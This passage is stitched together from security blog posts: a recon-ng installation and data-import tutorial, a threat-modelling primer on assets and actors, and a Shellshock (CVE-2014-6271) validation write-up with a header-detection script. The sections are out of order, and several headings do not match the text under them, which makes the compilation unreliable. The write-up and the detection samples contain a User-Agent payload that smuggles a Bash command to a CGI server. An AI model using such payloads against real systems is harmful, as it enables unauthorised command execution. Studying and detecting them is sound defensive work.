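    also keeps look-alikes such as notunited.com; this check does not."""
    name = name.lower().rstrip(".")
    return name == SCOPE_DOMAIN or name.endswith("." + SCOPE_DOMAIN)

def extract_emails(text: str) -> list[str]:
    """In-scope addresses, lower-cased and de-duplicated."""
    found = {m.group(0).lower() for m in EMAIL_RE.finditer(text)}
    return sorted(e for e in found if in_scope(e.split("@", 1)[1]))

def extract_hosts(text: str) -> list[str]:
    """Hostnames from 'ip:host' lines (the post's grep ':' step)."""
    hosts = set()
    for line in text.splitlines():
        ip, sep, host = line.strip().partition(":")
        if sep and ip.count(".") == 3 and in_scope(host):
            hosts.add(host.lower())
    return sorted(hosts)

def extract_vhosts(text: str) -> list[str]:
    """Last field of each line after the '=' ruler (the grep -A200 step)."""
    vhosts, after_ruler = set(), False
    for line in text.splitlines():
        fields = line.split()
        if fields and set(fields[0]) == {"="}:
            after_ruler = True
        elif after_ruler and fields and in_scope(fields[-1]):
            vhosts.add(fields[-1].lower())
    return sorted(vhosts)

def write_list(values: list[str], path: str) -> int:
    """One value per line, the layout import/list reads; returns the count."""
    Path(path).write_text("\n".join(values) + "\n")
    return len(values)
```

Writing each list with write_list produces files that can be loaded with the import/list module exactly as the post does below.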

It is time to import our information into recon-ng.

Using the show modules command, we get a list of modules broken down by category. We will use the import/list module from the Import category (Figure 18).

show modules

Figure 18: Import Modules

The “show info” command shows the options to set and the table and columns that will be needed for the import (Figure 19).

show info

Figure 19: Show Info

To find the column and table, we will use the “show schema” command. This gives us a list of the tables and the different columns in each (Figure 20).

show schema

Figure 20: Show Schema

To import email addresses, we will use the “contacts” table and the email column. Our file name will be the united_emails.txt file we created from theHarvester output. The “set” statement sets the variables for the import, and the “run” command executes the module (Figure 21).

set TABLE contacts
set COLUMN email
set FILENAME united_emails.txt
run

Figure 21: Email Import

The “show contacts” command shows the data inside the contacts table. This is a second verification that the data imported correctly (Figure 22).

Figure 22: Show Contacts

Part 3: Usage and Reporting

Intro

Recon-ng is an Open Source reconnaissance framework written in Python. This SQLite-database-driven tool incorporates Python modules and API keys to allow itself to be a conduit for many tools, ranging from theHarvester to Metasploit. It is an awesome standalone reconnaissance tool in its own right. As a side note we all totally have a geeky nerd crush on LaNMaSterR53.

This part of the series takes a look at installation and adding API keys. Later we will show you how to create a workspace, import data into the database, and export data for use with other tools.

For our targets of reconnaissance, we will use HackerOne’s directory of companies. This is not our way of saying, “Go out and hack these companies,” but our way of doing safe recon and providing continuous screenshots that will be easy to follow. This is also our way of introducing you to HackerOne and the Bug Bounty community if you are not already familiar with it.

Getting Started

While most penetration testers will be running this out of Kali Linux, the prerequisites (git and pip) may need to be installed before you start. Fortunately, this is easy on most Linux flavors and requires just a few simple commands:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip python-dev build-essential
sudo pip install --upgrade pip
sudo pip install --upgrade virtualenv

Next clone Recon-ng from Bitbucket (Figure 1). In this tutorial we clone to the home directory, but feel free to use whatever directory structure works for you.

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

Figure 1: git install

Next, change directory into the newly created recon-ng directory and list the contents (Figure 2).

cd recon-ng
ls

Figure 2: recon-ng contents

We will use the REQUIREMENTS file to finish installing the dependencies for recon-ng.

pip install -r REQUIREMENTS

At this point the installation is almost ready to use. We will go over a little bit of information now while you’re still paying attention, and then get recon-ng running and the API keys loaded.

The installation of recon-ng also created a hidden .recon-ng directory inside your home directory. This directory is initially empty; it is where your keys.db and your workspaces will be created. After starting recon-ng for the first time, a directory and the keys.db appear in the hidden .recon-ng directory (Figure 3).

Figure 3: .recon-ng directory

To run recon-ng, go to the folder where you ran the “git clone” command. This is where the magic happens.

cd recon-ng 
./recon-ng

Don’t worry if you get the “_api key not set” error (Figure 4). We have not added any API keys yet.

Figure 4: Initial Start

From our screen, we can see that there are 76 Recon modules, 8 Reporting modules, 2 Import modules, 2 Exploitation modules, and 2 Discovery modules. We are also using the “default” workspace (Figure 5).

Figure 5: Recon-ng start screen

Close recon-ng and let’s look at the modules and the underlying code (Figure 6).

cd modules
cd recon
ls

Figure 6: Module Directory

If we go inside the module directory and into a module, we can see the Python script that does all the magic (Figure 7).

Figure 7: Module Content

Adding API Keys

As I said in the introduction, this is a database-driven tool. Now it’s time to add information into the database.

The API keys are used by the modules to gather information for the SQLite database. Some of the API keys are free, but some can be expensive. I will keep this tutorial to the free API keys that are available.

After going back into the recon-ng directory and typing “./recon-ng”, you will be inside the recon-ng console (Figure 8).

keys list

Figure 8: Keys List

The following command is an example of adding the shodan_api key (bottom of Figure 8; look closely, it is there).

keys add shodan_api <paste key here>

API Keys Signup URLs

Signing up for the API keys is the least fun and most time-consuming part of the setup. Showing each signup would be lethally boring, so here is the list of URLs. All links open in a new window because we are thoughtful like that.

Google API – https://console.developers.google.com/apis/library
Bing API – https://msdn.microsoft.com/en-us/library/bing-ads-getting-started.aspx
Facebook API – https://developers.facebook.com/docs/apis-and-sdks
Instagram API – https://www.programmableweb.com/api/instagram
Linkedin API – https://developer.linkedin.com/docs/rest-api
Shodan API – https://developer.shodan.io/
Twitter API – https://apps.twitter.com/


Part 2: Workspaces and Importing Data

Now that you’ve identified what you have to protect, the next step is to figure out who you are protecting it from. This concept is much easier to understand. Almost all actors fall into two broad categories: internal and external actors.

Internal actors are employees, contractors, and third parties with access to your assets. Third parties could be employees of your cloud provider or the company that processes benefits and payroll.

Internal threats can result from actors inadvertently using their privilege improperly, such as creating a misconfiguration or clicking a link in a phishing email. Internal actors can also purposefully act maliciously and knowingly create threats in the environment, such as stealing data or installing malicious software.

  • Internal Actors
    • Employees
    • Contractors
    • Third Parties with access to assets
  • Internal Malicious Actors
    • Disgruntled Employees
    • Internal System Controlled by External Actor

Due to the inherent trust given to internal actors, the potential impact from these actors is higher than from external actors. While external actors make for better news stories and TV shows, it is imperative to review and mitigate threats from internal actors.

There are a number of different types of external actors, each with different motivations and goals.

  • External Malicious Actors
    • Hackers
    • Crackers
    • Hacktivists
    • Criminal Elements
    • Nation-States
    • Industrial Espionage

While the term Hacker has become synonymous with any individual with nefarious motives, the term is usually used for a curious, technically savvy individual who gains unauthorized privileges to a system without malicious intent.

On the other hand, Crackers are individuals with malicious intent who intentionally try to bypass security controls.

With the movement of activities online, normal protesters morphed into Hacktivists. Hacktivists target an organization with a political or social motive. While hackers or crackers choose targets of opportunity or with a financial motive, Hacktivists target a sector or organization for ideological reasons. Due to that ideological focus, it is possible that hacktivists will expend more time and effort on a target.

Criminal elements are attempting to monetize the assets of an organization. This is a fancy way of saying they will sell credit card numbers, personal information, or run bitcoin miners on computers. Ransomware, which encrypts user data and requires a ransom to access the encrypted files, is a common way to extort organizations for money.

Nation-States are highly funded and operate on extended time frames, usually in terms of years. Nation-states are incredibly difficult to defend against due to the additional levels of expertise they can bring to bear. If you are in an industry commonly targeted by a nation-state (such as Defense or Aerospace), focusing on breach detection and having a close relationship with law enforcement is paramount.

Industrial espionage is a catch-all term for any of the above individuals focusing on stealing trade secrets or sensitive organization data. Nation-states may engage in industrial espionage to give their companies a competitive edge. Criminal elements may target an organization to sell any information obtained during a breach or sell information found during an untargeted breach. Hacktivists will expose data found to further their ideological cause.

Now that you’ve determined who are the most likely actors in your threat model and also determined which would cause the largest potential impact, you can create a list of threats to focus on.

A quick example would be a coal company operating a mine.

Asset               Actor                         Threat      Mitigation
------------------  ----------------------------  ----------  -------------------------------
External Website    Hacktivists/Hackers/Crackers  Defacement  Quarterly Web Application Scans
Personnel HR Data   Employees/Third Party         Data Theft  Access Control Policies
Internal Network    Criminal Elements             Phishing    Phishing Awareness Training

Obviously, this list would be very long for any organization, but at some point, many of the mitigation elements will overlap. This means that in the previous example, the Access Control Policies that protect HR Personnel Data from Data Theft also protect it from access if a criminal element gains unauthorized access to the network. The best mitigation items will protect multiple assets from a variety of actors and eliminate most risk.

Where to Start

The simplest threat model is something (Asset) being manipulated by someone or something (Actor), resulting in a threat.

Threat Model Overview

This post deals with the first part of the equation.

Threat Model Asset

What are you protecting? Computer systems are relatively expensive to purchase. A server and attached disks that cost five thousand dollars to purchase new can easily store millions of dollars worth of data. Prior to engaging any company for a security assessment, it is imperative to understand exactly what needs to be protected and why.

Data and Data Flow

What is your company’s secret sauce? If you are protecting design documents for a widget, there is a chain of systems that all require protection. The storage system needs to be protected from unauthorized access. The end user system that is used to modify the documents requires that same level of protection. Also, the entire network that transmits the documents needs to be protected. This also needs to be done within a fixed budget and must not affect the ability of the company to make money. While Secure Network Management makes money securing networks, most companies do not.

Hardware

Why would someone want to compromise a computer? Data is valuable, but computers and networks can also be monetized. Bitcoin mining reduces the computing power available for legitimate activities and increases electricity usage. Spam malware uses computing power, network bandwidth, and has the potential for a legitimate business to be blacklisted by SMTP servers.

Now What

Know what your network is. While this sounds easy enough, it is normally one of the limiting factors. That is easy, right? You use that one 10.10.10.0/24 network for all your computers and servers. Done! Well…except each wireless access point uses a 192.168.1.0/24 network and the LAN-to-LAN tunnel into the Cloud provider’s network uses that 10.10.11.0/28 network. And that one guy who brought a wireless router in from home so he could watch movies on his iPad during work…I wish I had made that last one up. Better update all the spreadsheets! Security assessments are garbage in/garbage out; the assessors will only test what is in the scope you provide or authorize. If you do not know, or don’t have the technical expertise to determine, all of the networks in use, any reputable security or IT support company can review the network fabric. This review should not be a long or costly engagement.

Most people underestimate the number of devices on their network by at least 30%. Everything with a network cable is a potential target. Server and computer counts are normally pretty accurate. Printers, scanners, and peripherals are normally underestimated, if included at all. Network devices, beyond the core switch and router, normally do not show up on device spreadsheets. Obtaining a fairly accurate count of devices using a simple network scanner is also easily performed by a competent systems administrator, security, or IT support company.

You are now a few days into getting an asset list in order. This is a solid investment with or without an assessment. You cannot protect what you don’t know about.


End of Step 1: What you know – The networks and devices in use and data that is stored, processed, and transmitted on the network.

I was on an assessment this week just second-checking some scanner results and I ran across an interesting page (Figure 1).

Figure 1: cgi-bin in URL

I saw the cgi-bin and thought that it might be worth giving it a second look for Shellshock. Shellshock is the awesome brand name for CVE-2014-6271, which is a GNU Bash vulnerability. The client had placed significant restrictions on actual exploitation on the network; this was truly a vulnerability assessment with validation instead of a penetration test. The first thing I needed to do was see if the web server might be running on a vulnerable OS, so I did a simple Nmap scan (Figure 2).

Figure 2: Nmap results for web server

Now I had a potentially vulnerable OS and application vector to attack, so I fired up Burp Suite and captured a request to the application (Figure 3).

Figure 3: Request to R2 web application

Knowing that I couldn’t do a Bash one-liner or upload any code to the system due to the restrictions, I decided to start a tcpdump session looking for traffic from the remote host, tcpdump host 192.168.14.61 (Figure 5), and modified the User-Agent string to ( ) { :; }; /bin/bash “ping 192.168.30.54 -c 10” before forwarding the request on (Figure 4).

Figure 4: Shellshocking the User-Agent

Figure 5: tcpdump filtered for vulnerable host

Look at all those glorious packets! Just a reminder that *nix systems will ping until cancelled, so the -c 10 option instructed it to send only 10 instead of pinging until the end of time. If this had been a true penetration test, instead of sending a ping command I would have used a Bash one-liner to get an interactive shell. This was my first in-the-wild Shellshock, so it was still pretty fun.
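From the defender's side, the same User-Agent trick is easy to spot in captured traffic or web logs, because the Shellshock prefix is a fixed string at the start of a header value. The following is an added example, not code from the original post; the raw requests and IP addresses in it are constructed, and it checks every header (not just User-Agent) since a CGI server exports all of them to Bash.

```python
"""Flag Shellshock (CVE-2014-6271) probes in captured HTTP requests.

Added example; not code from the original post. A CGI web server exports
every request header into the environment (HTTP_USER_AGENT, HTTP_COOKIE,
HTTP_REFERER, ...), which is why the post's User-Agent trick reaches Bash,
so detection inspects every header value, not only User-Agent. The
requests below are constructed samples; addresses are documentation IPs."""
import re

# Bash treated an environment value beginning with "() {" as a function
# definition and kept executing what followed the closing brace; that
# prefix is the signature. The regex tolerates the spacing variants seen.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")

CONSTRUCTED_REQUESTS = [
    # The post's probe: a ping, so tcpdump on the tester's host sees ICMP.
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: () { :; }; /bin/bash \"ping 192.0.2.99 -c 10\"\r\n"
    "\r\n",
    # Same prefix in a different header, with tighter spacing.
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: curl/7.38.0\r\n"
    "Referer: () {:;}; echo vulnerable\r\n"
    "\r\n",
    # Benign: parentheses and braces appear, but not as the "() {" prefix.
    "GET /cgi-bin/status HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) {custom-build}\r\n"
    "\r\n",
]

def parse_headers(raw_request: str) -> list[tuple[str, str]]:
    """(name, value) pairs from a raw request; stops at the blank line."""
    headers = []
    for line in raw_request.split("\r\n")[1:]:  # skip the request line
        if line == "":
            break  # end of headers; any body follows
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip(), value.strip()))
    return headers

def shellshock_headers(raw_request: str) -> list[str]:
    """Names of headers whose value starts with the function prefix."""
    return [name for name, value in parse_headers(raw_request)
            if SHELLSHOCK_RE.match(value)]

def scan(requests: list[str]) -> list[tuple[int, str]]:
    """(request index, header name) for every flagged header."""
    return [(idx, name) for idx, raw in enumerate(requests)
            for name in shellshock_headers(raw)]

if __name__ == "__main__":
    for idx, name in scan(CONSTRUCTED_REQUESTS):
        print(f"request {idx}: Shellshock prefix in {name} header")
```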